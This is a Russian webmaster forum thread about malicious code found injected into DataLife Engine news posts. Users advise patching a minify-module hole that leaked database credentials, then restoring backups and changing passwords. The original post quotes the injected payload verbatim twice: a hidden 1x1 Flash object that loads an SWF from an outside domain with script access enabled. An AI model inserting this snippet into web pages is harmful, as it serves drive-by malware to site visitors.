оявление постороннего кода в новостях DLE

A
На сайте с 25.03.2012
Offline
59
21874

Добрый день! Редактируя ранее добавленные новости на сайте DLE обнаружил в постах (в конце поста) появление вот такого кода:

Краткая новость:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?437160373"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1024826446" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>

Полная новость:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?482681700"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?48623104" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>

Откуда это может появляться? Может взлом какой? Ссылка ведет на панель вэбмастера яндекса.

djinn11
На сайте с 16.05.2010
Offline
52
#1
Abrikosik:
Добрый день! Редактируя ранее добавленные новости на сайте DLE обнаружил в постах (в конце поста) появление вот такого кода:
Откуда это может появляться? Может взлом какой? Ссылка ведет на панель вэбмастера яндекса.

Это вредоносный код.

Сначала сделай фикс - http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

Потом отредактируй все новости.

SIQWELL - Сервера, VDS, Хостинг во Франции, Люксембурге. Администрирование и IT обслуживание (https://siqwell.pw/aff.php?aff=003) Лучшая партнерка для download трафика! (http://loadpays.com/s.php?f=11008)
A
На сайте с 25.03.2012
Offline
59
#2

Огромное спасибо за информацию Вам, проблема устранена...

ProLiant
На сайте с 07.12.2005
Offline
249
#3
Abrikosik:
Огромное спасибо за информацию Вам, проблема устранена...

Каким образом? Сегодня и у себя нашел эту заразу...

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
Станислав
На сайте с 27.12.2009
Offline
237
#4
ProLiant:
Каким образом? Сегодня и у себя нашел эту заразу...

Видать в модуле каком то дырдочка.

Мы там, где рады нас видеть.
ProLiant
На сайте с 07.12.2005
Offline
249
#5

Может это и из-за дыры, о которой выше говорилось... А спрашивал, как все удалил? :)

BrightGuy
На сайте с 03.10.2010
Offline
179
#6

Суть этой дыры в том что хакер кеширует файл dbconfig , при этом в папке \engine\cache\system создаются кешируемые копии которые можно потом легко считать и узнать логин и пароль к базе, а потом залить в базу что угодно. фикс устраняет эту возможность

-= Сайты на заказ | Правки, обновление, работы по DLE =- (/ru/forum/791118) Skype: rus.shevchuk (skype:rus.shevchuk?chat) | Telegram: @ruslansh (tg://resolve?domain=ruslansh) | ICQ: 606535768 | info@ruslan-shevchuk.com
D
На сайте с 01.02.2010
Offline
75
#7

Только что и у себя подобное удалял...

Всё новости почистил самым простым способом - восстановлением из утреннего бекапа :)

Кстати да, как и сказал BrightGuy, ваш пароль к БД могли узнать. У себя я сменил ещё имя БД, пользователя БД и его пароль.

BrightGuy
На сайте с 03.10.2010
Offline
179
#8

Кстати кто знает как этот код вычистить одним махом, не охота все руками перебирать.

Нужна команда которая удалил его, пробовал через замену в админке, что-то не работает

W
На сайте с 04.06.2011
Offline
17
#9
BrightGuy:
Кстати кто знает как этот код вычистить одним махом, не охота все руками перебирать.
Нужна команда которая удалил его, пробовал через замену в админке, что-то не работает

Я делал так, скачивал базу данных, открывал в notepad++, а там обычной заменой, вставил код и заменить все. Далее почищенную базу заливал обратно.

BrightGuy
На сайте с 03.10.2010
Offline
179
#10
WPseo:
Я делал так, скачивал базу данных, открывал в notepad++, а там обычной заменой, вставил код и заменить все. Далее почищенную базу заливал обратно.

Тоже только что так пробовал, что-то не получается, буду пробовать еще

---------- Добавлено 11.09.2013 в 19:38 ----------

Со второго раза все получилось, глюк какой-то)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий